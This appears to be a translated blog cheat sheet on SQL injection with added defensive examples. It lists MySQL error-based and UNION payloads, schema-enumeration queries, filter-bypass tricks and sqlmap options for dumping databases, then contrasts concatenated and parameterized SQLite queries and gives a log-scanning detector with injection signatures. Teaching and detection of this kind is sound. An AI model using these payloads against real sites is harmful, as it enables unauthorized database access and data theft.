SQL injection knowledge consolidation (Basic Edition)

Basic steps

  1. Check whether the input triggers an error
  2. Identify the closing character (quote, bracket, etc.)
  3. Determine the injection type
  4. Construct the payload
  5. Inject manually or with a script

Basic injection types

  • Error-based injection
    • floor() form (the derived table at the end is aliased a): and (select 1 from (select count(*), concat((payload), floor(rand(0)*2)) x from information_schema.tables group by x) a)
    • extractvalue() form (a tilde, 0x7e, on both sides of the payload): and extractvalue(1, concat(0x7e, (payload), 0x7e))
  • Boolean-based injection
  • UNION query injection
    • Find the echoed column: UNION SELECT 1,2,3;
  • Time-based (delay) injection
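
The following is an added example, not code from the original post: a constructed SQLite database with a lookup written the vulnerable way (string concatenation) next to the same lookup written with a bound parameter. It demonstrates steps 1 and 3 above from the defender's side: a lone quote makes the concatenated query error out, and a boolean condition changes the result set, while the parameterized version treats the same input as a literal name and returns nothing. The table name and rows are constructed for the example.

```python
import sqlite3


def make_db():
    """Constructed in-memory sample database (not from the original post)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (name, role) VALUES (?, ?)",
        [("alice", "admin"), ("bob", "user"), ("carol", "user")],
    )
    return conn


def lookup_vulnerable(conn, name):
    # String concatenation: the input becomes part of the SQL text, so a quote
    # in the input closes the literal and whatever follows is parsed as SQL.
    sql = "SELECT id, name, role FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, name):
    # Bound parameter: the driver sends the value separately from the statement;
    # quotes or keywords in it are never parsed as SQL.
    sql = "SELECT id, name, role FROM users WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


def probe(lookup, conn, name):
    """Run one lookup and report ('rows', count) or ('error', message),
    so the two implementations can be compared on the same input."""
    try:
        return ("rows", len(lookup(conn, name)))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = make_db()
    for value in ["bob", "bob'", "x' OR '1'='1"]:
        print(repr(value), "vulnerable:", probe(lookup_vulnerable, db, value),
              "safe:", probe(lookup_safe, db, value))
```

Step 1 of the procedure is the `"bob'"` case: the concatenated query raises a syntax error, which is the signal an attacker looks for and which an application should never surface to the client. The boolean case returns all three rows from the concatenated query and zero rows from the parameterized one, which is the whole point of using placeholders.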

Other injection techniques

  • HTTP parameter pollution (HPP) to bypass a WAF
  • Wide-byte injection to bypass quote filtering
  • CHAR() function to bypass quote filtering
  • || and && to bypass filtering of and / or
  • Splitting strings with delimiters to bypass a filter
  • Second-order injection
  • Linux special characters to bypass space filtering
  • Parentheses to bypass the filter

Common SQL statements and functions

  • Take a substring: mid(string, start, length)
  • Take a leading substring: left(string, length)
  • Get the ASCII code: ascii(char)
  • Query the current database: database()
  • Query the current user: user()
  • Current database version: @@version
  • Database file path: @@datadir
  • Enumerate tables: select table_name from information_schema.tables where table_schema='database'
  • Enumerate columns: select column_name from information_schema.columns where table_schema='database' and table_name='table'
  • String concatenation: concat()
  • Concatenate a result set into one string: group_concat()
  • Concatenate with a separator: concat_ws(separator, ...)
  • Guess the number of columns: ORDER BY x

sqlmap basics

  • -u specify the URL
  • -p specify the parameter
  • -D specify the database
  • -T specify the table
  • -C specify the column
  • --current-db current database
  • --current-user current user
  • --dbs list all databases
  • --tables list all tables
  • --columns list all column names
  • --dump dump the records
  • --technique X (X = B boolean-based, E error-based, U UNION query, T time-based): specify the injection technique

Important points

  • Special characters such as & must be URL-encoded
  • + in a GET parameter is decoded as a space
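
As an added example (not from the original post), the detector below applies the injection types from this page to constructed web-server access-log lines. It decodes query strings the way the server does, so the two points above matter: `%27` becomes a quote and `+` becomes a space before the signatures are checked, and every value of a repeated parameter is inspected so an HPP request does not slip past on its clean first value. The log format, IPs and paths are constructed; `sleep()` and `benchmark()` are the usual MySQL delay functions behind "time-based injection", which the page names as a technique but not as a function.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Signatures for the injection types listed on this page: UNION query,
# error-based (extractvalue / floor(rand)), schema enumeration, time-based
# (sleep/benchmark assumed, not named on the page) and boolean conditions.
SIGNATURES = {
    "union":   re.compile(r"\bunion\b.*\bselect\b", re.I | re.S),
    "error":   re.compile(r"extractvalue\s*\(|floor\s*\(\s*rand\s*\(", re.I),
    "schema":  re.compile(r"information_schema\.", re.I),
    "time":    re.compile(r"\bsleep\s*\(|\bbenchmark\s*\(", re.I),
    "boolean": re.compile(r"""\b(?:and|or)\s+['"]?\w+['"]?\s*=\s*['"]?\w+""", re.I),
}

# Common-log-format request line: client IP and request path are captured.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/')

# Constructed sample access-log lines (not from the original post).
LOG_LINES = [
    '10.0.0.5 - - [10/Jul/2019:12:00:01 +0800] "GET /item.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [10/Jul/2019:12:00:02 +0800] "GET /item.php?id=1%27 HTTP/1.1" 500 88',
    '10.0.0.5 - - [10/Jul/2019:12:00:03 +0800] "GET /item.php?id=1+and+1%3D1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [10/Jul/2019:12:00:04 +0800] "GET /item.php?id=-1+union+select+1,2,3 HTTP/1.1" 200 400',
    '10.0.0.5 - - [10/Jul/2019:12:00:05 +0800] "GET /item.php?id=1&id=1+and+extractvalue(1,concat(0x7e,database(),0x7e)) HTTP/1.1" 500 88',
    '10.0.0.7 - - [10/Jul/2019:12:00:06 +0800] "GET /search.php?q=rock+and+roll HTTP/1.1" 200 2048',
]


def decoded_params(request_path):
    """Query parameters as {name: [values]} with %xx and '+' decoded as the
    server sees them. All values of a repeated name are kept, so a
    parameter-pollution request (id=1&id=...) is inspected in full."""
    return parse_qs(urlsplit(request_path).query, keep_blank_values=True)


def signatures_in(value):
    hits = {name for name, rx in SIGNATURES.items() if rx.search(value)}
    if value.count("'") % 2 == 1:  # lone quote: the "does it error?" probe of step 1
        hits.add("quote")
    return hits


def classify(line):
    """Sorted signature names found in any parameter value of one log line."""
    m = REQUEST_RE.match(line)
    if not m:
        return []
    hits = set()
    for values in decoded_params(m.group(2)).values():
        for value in values:
            hits |= signatures_in(value)
    return sorted(hits)


def scan(lines):
    """Findings for every line that matched at least one signature."""
    findings = []
    for line in lines:
        hits = classify(line)
        if hits:
            m = REQUEST_RE.match(line)
            findings.append({"ip": m.group(1), "path": m.group(2), "hits": hits})
    return findings


if __name__ == "__main__":
    for finding in scan(LOG_LINES):
        print(finding["ip"], finding["hits"], finding["path"])
```

The bypass techniques listed earlier on this page (wide-byte quotes, CHAR(), split strings, alternative whitespace) are precisely what defeats pattern matching like this, so treat it as a way to spot probing in logs, not as protection; the fix remains parameterized queries in the application.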

Source: www.cnblogs.com/tiumo/p/11222154.html